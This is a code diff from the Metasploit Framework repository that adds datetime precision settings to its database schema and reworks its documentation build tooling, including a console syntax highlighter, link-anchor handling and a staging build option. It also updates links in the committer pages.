    t.integer "logins_count", default: 0
    t.index ["origin_type", "origin_id"], name: "index_metasploit_credential_cores_on_origin_type_and_origin_id"
    t.index ["private_id"], name: "index_metasploit_credential_cores_on_private_id"
@@ -264,56 +263,56 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "service_id", null: false
    t.string "access_level"
    t.string "status", null: false
-    t.datetime "last_attempted_at"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "last_attempted_at", precision: nil
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true
    t.index ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true
  end

  create_table "metasploit_credential_origin_cracked_passwords", id: :serial, force: :cascade do |t|
    t.integer "metasploit_credential_core_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["metasploit_credential_core_id"], name: "originating_credential_cores"
  end

  create_table "metasploit_credential_origin_imports", id: :serial, force: :cascade do |t|
    t.text "filename", null: false
    t.integer "task_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id"
  end

  create_table "metasploit_credential_origin_manuals", id: :serial, force: :cascade do |t|
    t.integer "user_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id"
  end

  create_table "metasploit_credential_origin_services", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
    t.text "module_full_name", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true
  end

  create_table "metasploit_credential_origin_sessions", id: :serial, force: :cascade do |t|
    t.text "post_reference_name", null: false
    t.integer "session_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true
  end

  create_table "metasploit_credential_privates", id: :serial, force: :cascade do |t|
    t.string "type", null: false
    t.text "data", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "jtr_format"
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))"
@@ -321,8 +320,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "metasploit_credential_publics", id: :serial, force: :cascade do |t|
    t.string "username", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "type", null: false
    t.index ["username"], name: "index_metasploit_credential_publics_on_username", unique: true
  end
@@ -330,8 +329,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "metasploit_credential_realms", id: :serial, force: :cascade do |t|
    t.string "key", null: false
    t.string "value", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true
  end

@@ -361,7 +360,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "module_details", id: :serial, force: :cascade do |t|
-    t.datetime "mtime"
+    t.datetime "mtime", precision: nil
    t.text "file"
    t.string "mtype"
    t.text "refname"
@@ -371,7 +370,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.text "description"
    t.string "license"
    t.boolean "privileged"
-    t.datetime "disclosure_date"
+    t.datetime "disclosure_date", precision: nil
    t.integer "default_target"
    t.text "default_action"
    t.string "stance"
@@ -402,7 +401,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "module_runs", id: :serial, force: :cascade do |t|
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.text "fail_detail"
    t.string "fail_reason"
    t.text "module_fullname"
@@ -414,8 +413,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "trackable_type"
    t.integer "user_id"
    t.string "username"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["session_id"], name: "index_module_runs_on_session_id"
    t.index ["user_id"], name: "index_module_runs_on_user_id"
  end
@@ -428,8 +427,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "nexpose_consoles", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.boolean "enabled", default: true
    t.text "owner"
    t.text "address"
@@ -444,12 +443,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "notes", id: :serial, force: :cascade do |t|
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "ntype", limit: 512
    t.integer "workspace_id", default: 1, null: false
    t.integer "service_id"
    t.integer "host_id"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.boolean "critical"
    t.boolean "seen"
    t.text "data"
@@ -471,13 +470,13 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "raw_payload_hash"
    t.string "build_status"
    t.string "build_opts"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "profiles", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.boolean "active", default: true
    t.text "name"
    t.text "owner"
@@ -486,9 +485,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "refs", id: :serial, force: :cascade do |t|
    t.integer "ref_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name", limit: 512
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.index ["name"], name: "index_refs_on_name"
  end

@@ -497,8 +496,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "created_by"
    t.string "path", limit: 1024
    t.text "name"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "reports", id: :serial, force: :cascade do |t|
@@ -507,9 +506,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "rtype"
    t.string "path", limit: 1024
    t.text "options"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
-    t.datetime "downloaded_at"
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
+    t.datetime "downloaded_at", precision: nil
    t.integer "task_id"
    t.string "name", limit: 63
  end
@@ -522,12 +521,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "services", id: :serial, force: :cascade do |t|
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.integer "port", null: false
    t.string "proto", limit: 16, null: false
    t.string "state"
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.text "info"
    t.index ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true
    t.index ["name"], name: "index_services_on_name"
@@ -543,7 +542,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.binary "output"
    t.string "remote_path"
    t.string "local_path"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
  end

  create_table "sessions", id: :serial, force: :cascade do |t|
@@ -555,11 +554,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "port"
    t.string "platform"
    t.text "datastore"
-    t.datetime "opened_at", null: false
-    t.datetime "closed_at"
+    t.datetime "opened_at", precision: nil, null: false
+    t.datetime "closed_at", precision: nil
    t.string "close_reason"
    t.integer "local_id"
-    t.datetime "last_seen"
+    t.datetime "last_seen", precision: nil
    t.integer "module_run_id"
    t.index ["module_run_id"], name: "index_sessions_on_module_run_id"
  end
@@ -571,51 +570,51 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.boolean "report_summary", default: false, null: false
    t.boolean "report_detail", default: false, null: false
    t.boolean "critical", default: false, null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_creds", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "cred_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_hosts", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "host_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_services", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_sessions", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "session_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "tasks", id: :serial, force: :cascade do |t|
    t.integer "workspace_id", default: 1, null: false
    t.string "created_by"
    t.string "module"
-    t.datetime "completed_at"
+    t.datetime "completed_at", precision: nil
    t.string "path", limit: 1024
    t.string "info"
    t.string "description"
    t.integer "progress"
    t.text "options"
    t.text "error"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "result"
    t.string "module_uuid", limit: 8
    t.binary "settings"
@@ -626,8 +625,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "crypted_password"
    t.string "password_salt"
    t.string "persistence_token"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "fullname"
    t.string "email"
    t.string "phone"
@@ -638,7 +637,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "vuln_attempts", id: :serial, force: :cascade do |t|
    t.integer "vuln_id"
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.boolean "exploited"
    t.string "fail_reason"
    t.string "username"
@@ -661,26 +660,26 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "nx_vuln_id"
    t.float "nx_severity"
    t.float "nx_pci_severity"
-    t.datetime "nx_published"
-    t.datetime "nx_added"
-    t.datetime "nx_modified"
+    t.datetime "nx_published", precision: nil
+    t.datetime "nx_added", precision: nil
+    t.datetime "nx_modified", precision: nil
    t.text "nx_tags"
    t.text "nx_vuln_status"
    t.text "nx_proof_key"
    t.string "src"
    t.integer "nx_scan_id"
-    t.datetime "nx_vulnerable_since"
+    t.datetime "nx_vulnerable_since", precision: nil
    t.string "nx_pci_compliance_status"
  end

  create_table "vulns", id: :serial, force: :cascade do |t|
    t.integer "host_id"
    t.integer "service_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.string "info", limit: 65536
-    t.datetime "exploited_at"
+    t.datetime "exploited_at", precision: nil
    t.integer "vuln_detail_count", default: 0
    t.integer "vuln_attempt_count", default: 0
    t.integer "origin_id"
@@ -696,8 +695,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_forms", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path"
    t.string "method", limit: 1024
    t.text "params"
@@ -707,15 +706,15 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_pages", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path"
    t.text "query"
    t.integer "code", null: false
    t.text "cookie"
    t.text "auth"
    t.text "ctype"
-    t.datetime "mtime"
+    t.datetime "mtime", precision: nil
    t.text "location"
    t.text "headers"
    t.binary "body"
@@ -726,8 +725,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_sites", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "vhost", limit: 2048
    t.text "comments"
    t.text "options"
@@ -738,8 +737,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_vulns", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path", null: false
    t.string "method", limit: 1024, null: false
    t.text "params"
@@ -773,8 +772,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "respcode", limit: 16
    t.text "resphead"
    t.text "response"
-    t.datetime "created_at"
-    t.datetime "updated_at"
+    t.datetime "created_at", precision: nil
+    t.datetime "updated_at", precision: nil
  end

  create_table "wmap_targets", id: :serial, force: :cascade do |t|
@@ -783,8 +782,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "port"
    t.integer "ssl"
    t.integer "selected"
-    t.datetime "created_at"
-    t.datetime "updated_at"
+    t.datetime "created_at", precision: nil
+    t.datetime "updated_at", precision: nil
  end

  create_table "workspace_members", id: false, force: :cascade do |t|
@@ -794,8 +793,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "workspaces", id: :serial, force: :cascade do |t|
    t.string "name"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "boundary", limit: 4096
    t.string "description", limit: 4096
    t.integer "owner_id"
@@ -7,4 +7,4 @@ vendor
 # These files will be generated by build.rb and do not need to be committed
 docs
 metasploit-framework.wiki.old
-index.md
+/index.md
@@ -13,6 +13,19 @@ How it works:

 Behind the scenes these docs are built and deployed to https://docs.metasploit.com/

+### Adding pages
+
+You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
+To add a new page, modify `navigation.rb`. Full details are found beside the `NAVIGATION_CONFIG` constant.
+
+## Adding links
+
+For linking to other docs the Github markdown syntax `[[link text|relative_path_to_docs]]` is used. Behind the scenes these
+links will be verified at build time to ensure there's no 404 links.
+
+Note: It is also possible to use the syntax `[[link text|relative_path_to_docs#section]]` - but this navigation will happen client side, and
+there is no validation that these sections exist at build time. It is possible for future edits to a markdown file to break these links.
+
 ## Setup

 ### Developer build
@@ -42,9 +55,3 @@ bundle exec ruby build.rb --production --serve
 ```

 Now visit http://127.0.0.1:4000/metasploit-framework/
-
-
-### Contributing Documentation
-
-You can modify existing documentation files within `metasploit-framework.wiki/` with an editor of your choice and send a pull request.
-Note that adding a new page will also require modifying `navigation.rb` to appear on the navigation menu.
@@ -0,0 +1,3 @@
+# Staging assumes that it is currently deployed to gh-pages; All links are prefixed with /metasploit-framework
+baseurl: 'metasploit-framework'
+ga_tracking: ''
@@ -0,0 +1,29 @@
+<style>
+#main-content p {
+    text-align: justify;
+}
+
+.language-mermaid .label {
+    text-transform: inherit;
+}
+
+.language-msf .zp {
+    text-decoration: underline;
+}
+
+.language-msf .ze {
+    color: #960050;
+}
+
+.language-msf .zg {
+    color: #859900;
+}
+
+.language-msf .zs {
+    color: #268bd2;
+}
+
+.language-msf .zw {
+    color: orange;
+}
+</style>
@@ -0,0 +1,74 @@
+require 'rouge'
+
+# Custom highlighting support for Metasploit's prompt
+# https://rouge-ruby.github.io/docs/file.LexerDevelopment.html
+module Rouge
+  # Custom tokens specific to Msf, as the inbuilt lexer tokens can't capture
+  # the detail required for Msf's print_warning/print_good/etc calls.
+  module Tokens
+    def self.token(name, shortname, &b)
+      tok = Token.make_token(name, shortname, &b)
+      const_set(name, tok)
+    end
+
+    # The 'shortname' is the class used when generating the HTML. It is intentionally
+    # short to reduce HTML size.
+    # https://github.com/rouge-ruby/rouge/blob/a4ed658d2778a3e2d3e68873f7221b91149a2ed4/lib/rouge/token.rb#L69
+    SHORTNAME = 'z'
+
+    token :Msf, SHORTNAME do
+      # prompt - msf / msf5 / msf6 / meterpreter
+      token :Prompt, "#{SHORTNAME}p"
+      # [-]
+      token :Error, "#{SHORTNAME}e"
+      # [+]
+      token :Good, "#{SHORTNAME}g"
+      # [*]
+      token :Status, "#{SHORTNAME}s"
+      # [!]
+      token :Warning, "#{SHORTNAME}w"
+    end
+  end
+
+  module Lexers
+    class MetasploitConsoleLanguage < Rouge::RegexLexer
+      title 'msf'
+      tag 'msf'
+      desc 'Metasploit console highlighter'
+      filenames []
+      mimetypes []
+
+      def self.keywords
+        @keywords ||= Set.new %w()
+      end
+
+      state :whitespace do
+        rule %r/\s+/, Text
+      end
+
+      state :root do
+        mixin :whitespace
+
+        # Match msf, msf5, msf6, meterpreter
+        rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
+        rule %r{^\[-\]}, Tokens::Msf::Error
+        rule %r{^\[\+\]}, Tokens::Msf::Good
+        rule %r{^\[\*\]}, Tokens::Msf::Status
+        rule %r{^\[\!\]}, Tokens::Msf::Warning
+        rule %r{.+}, Text
+      end
+
+      # State for highlighting the prompt such as
+      # msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
+      state :msf_prompt do
+        mixin :whitespace
+
+        rule %r{exploit|payload|auxiliary|encoder|evasion|post|nop}, Text
+        rule %r{\(}, Punctuation
+        rule %r{\)}, Punctuation
+        rule %r{[\w/]+}, Keyword::Constant
+        rule %r{>}, Punctuation, :pop!
+      end
+    end
+  end
+end
@@ -2,6 +2,7 @@ require 'fileutils'
 require 'uri'
 require 'open3'
 require 'optparse'
+require 'did_you_mean'
 require_relative './navigation'

 # This build module was used to migrate the old Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
@@ -48,13 +49,18 @@ module Build
    def validate!
      configured_paths = all_file_paths
      missing_paths = available_paths.map { |path| path.gsub("#{WIKI_PATH}/", '') } - ignored_paths - existing_docs - configured_paths
-      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?
+      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')} - add navigation entries to navigation.rb for these files" if missing_paths.any?

      each do |page|
        page_keys = page.keys
        allowed_keys = %i[old_wiki_path path new_base_name nav_order title new_path folder children has_children parents]
        invalid_keys = page_keys - allowed_keys
-        raise ConfigValidationError, "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
+
+        suggestion = DidYouMean::SpellChecker.new(dictionary: allowed_keys).correct(invalid_keys[0]).first
+        error = "#{page} had invalid keys #{invalid_keys.join(', ')}."
+        error += " Did you mean #{suggestion}?" if suggestion
+
+        raise ConfigValidationError, error  if invalid_keys.any?
      end

      # Ensure unique folder names
@@ -181,16 +187,22 @@ module Build
      @config.enum_for(:each).map { |page| page }
    end

-    # scans for absolute links to the old wiki such as 'https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service'
+    # scans for absolute links to the old wiki such as 'https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html'
    def extract_absolute_wiki_links(markdown)
      new_links = {}

-      markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_-]+))}) do |full_match, old_path|
+      markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_#-]+))}) do |full_match, old_path|
        full_match = full_match.gsub(/[).]+$/, '')
        old_path = URI.decode_www_form_component(old_path.gsub(/[).]+$/, ''))

-        new_path = new_path_for(old_path)
-        replacement = "{% link docs/#{new_path} %}"
+        begin
+          old_path_anchor = URI.parse(old_path).fragment
+        rescue URI::InvalidURIError
+          old_path_anchor = nil
+        end
+
+        new_path = new_path_for(old_path, old_path_anchor)
+        replacement = "{% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""}"

        link = {
          full_match: full_match,
@@ -210,19 +222,26 @@ module Build
    #   '[[Custom name|Relative Path]]'
    #   '[[Custom name|relative-path]]'
    #   '[[Custom name|./relative-path.md]]'
+    #   '[[Custom name|./relative-path.md#section-anchor-to-link-to]]'
+    # Note that the page target resource file is validated for existence at build time - but the section anchors are not
    def extract_relative_links(markdown)
      existing_links = @links
      new_links = {}

-      markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.-]+))?\]\])/) do |full_match, left, right|
+      markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.#-]+))?\]\])/) do |full_match, left, right|
        old_path = (right || left)
-        new_path = new_path_for(old_path)
+        begin
+          old_path_anchor = URI.parse(old_path).fragment
+        rescue URI::InvalidURIError
+          old_path_anchor = nil
+        end
+        new_path = new_path_for(old_path, old_path_anchor)
        if existing_links[full_match] && existing_links[full_match][:new_path] != new_path
          raise "Link for #{full_match} previously resolved to #{existing_links[full_match][:new_path]}, but now resolves to #{new_path}"
        end

        link_text = left
-        replacement = "[#{link_text}]({% link docs/#{new_path} %})"
+        replacement = "[#{link_text}]({% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""})"

        link = {
          full_match: full_match,
@@ -239,8 +258,17 @@ module Build
      new_links
    end

-    def new_path_for(old_path)
-      old_path = old_path.gsub(' ', '-')
+    def new_path_for(old_path, old_path_anchor)
+      # Strip out any leading `./` or `/` before the relative path.
+      # This is needed for our later code that does additional filtering for
+      # potential ambiguity with absolute paths since those comparisons occur
+      # against filenames without the leading ./ and / parts.
+      old_path = old_path.gsub(/^[.\/]+/, '')
+
+      # Replace any spaces in the file name with - separators, then
+      # make replace anchors with an empty string.
+      old_path = old_path.gsub(' ', '-').gsub("##{old_path_anchor}", '')
+
      matched_pages = pages.select do |page|
        !page[:folder] &&
          (File.basename(page[:path]).downcase == "#{File.basename(old_path)}.md".downcase ||
@@ -249,8 +277,20 @@ module Build
      if matched_pages.empty?
        raise "Link not found: #{old_path}"
      end
+      # Additional filter for absolute paths if there's potential ambiguity
      if matched_pages.count > 1
-        raise "Duplicate paths for #{old_path}"
+        refined_pages = matched_pages.select do |page|
+          !page[:folder] &&
+            (page[:path].downcase == "#{old_path}.md".downcase ||
+              page[:path].downcase == old_path.downcase)
+        end
+
+        if refined_pages.count != 1
+          page_paths = matched_pages.map { |page| page[:path] }
+          raise "Duplicate paths for #{old_path} - possible page paths found: #{page_paths}"
+        end
+
+        matched_pages = refined_pages
      end

      matched_pages.first.fetch(:new_path)
@@ -281,6 +321,9 @@ module Build
      ]
      # These tags look like Github/Twitter handles, but are actually ruby/java code snippets
      ignored_tags = [
+        '@spid',
+        '@adf3',
+        '@LDAP-DC3',
        '@harmj0yDescription',
        '@phpsessid',
        '@http_client',
@@ -547,6 +590,13 @@ module Build
      FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
      run_command('JEKYLL_ENV=production bundle exec jekyll build')

+      if options[:serve]
+        ReleaseBuildServer.run
+      end
+    elsif options[:staging]
+      FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
+      run_command('JEKYLL_ENV=production bundle exec jekyll build --config _config.yml,_config_staging.yml')
+
      if options[:serve]
        ReleaseBuildServer.run
      end
@@ -572,6 +622,10 @@ if $PROGRAM_NAME == __FILE__
      options[:production] = production
    end

+    opts.on('--staging', 'Run a staging build for deploying to gh-pages') do |staging|
+      options[:staging] = staging
+    end
+
    opts.on('--serve', 'serve the docs site') do |serve|
      options[:serve] = serve
    end
@@ -1,3 +1,3 @@
 View the latest API docs at:

-[https://rapid7.github.io/metasploit-framework/api/](https://rapid7.github.io/metasploit-framework/api/)
+[https://docs.metasploit.com/api/](https://docs.metasploit.com/api/)
@@ -5,8 +5,6 @@ can be used to verify merge commits made to <https://github.com/rapid7/metasploi

 Keybase.io is used by Metasploit as an easy way to verify identities of committers. If you're a committer on metasploit-framework, and you need an invite, just ask.

-<sup>Altering this table's layout will almost certainly break [import-dev-keys.sh](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/import-dev-keys.sh), so please don't.</sup>
-
 | Github Username                                   | Keybase.io Username                                |
 | ------------------------------------------------- | -------------------------------------------------- |
 | [@adfoster-r7](https://github.com/adfoster-r7)    | [adfosterr7](https://keybase.io/adfosterr7)        |
@@ -78,7 +76,7 @@ Please select what kind of key you want:
   (4) RSA (sign only)
 Your selection? 4
 RSA keys may be between 1024 and 4096 bits long.
-What keysize do you want? (2048) 
+What keysize do you want? (2048)
 Requested keysize is 2048 bits
 Please specify how long the key should be valid.
         0 = key does not expire
@@ -96,7 +94,7 @@ from the Real Name, Comment and Email Address in this form:

 Real name: Dade Murphy
 Email address: dmurphy@thegibson.example
-Comment: 
+Comment:
 You selected this USER-ID:
    "Dade Murphy <dmurphy@thegibson.example>"

@@ -120,7 +118,7 @@ Enter passphrase: [...]

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

-[msf-committers]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights
+[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
 [pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
 [con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
 [tracking]:https://github.com/keybase/keybase-issues/issues/100
@@ -2,7 +2,7 @@

 The term "Metasploit Committers" describes people who have direct write access to the [Rapid7 Metasploit-Framework fork](https://github.com/rapid7/metasploit-framework). These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers.

-We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) setup guide.
+We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] setup guide.

 Metasploit committers are a mix of [Rapid7](http://rapid7.com) employees and outside contributors. Anyone can become a contributor, with the following expectations:

@@ -24,7 +24,7 @@ If you reject a pull request, be clear in the pull request why it was rejected,

 Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally.

-A list of committer public keys [is here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
+A list of committer public keys [[is here|./Committer-Keys.md]].

 # How to Gain Commit Rights

@@ -45,7 +45,7 @@ Breaches of trust in terms of malicious or malformed code, or the demonstration

 # Useful Links for Committers

-  * [http://r-7.co/MSF-DEV](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) is pretty much required reading.
+  * [[Setting Up a Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] is pretty much required reading.
  * So is [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md)
  * Check out the Apache Software Foundation's [Guide for Committers](https://www.apache.org/dev/committers). It's illuminating.
  * [Producing Open Source Software](http://www.producingoss.com/gl/) by Ken Fogel is a must-read.
@@ -358,7 +358,6 @@ Pulling it all together, we get a new `ftp_login` module that looks something li
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
 require 'metasploit/framework/credential_collection'
 require 'metasploit/framework/login_scanner/ftp'

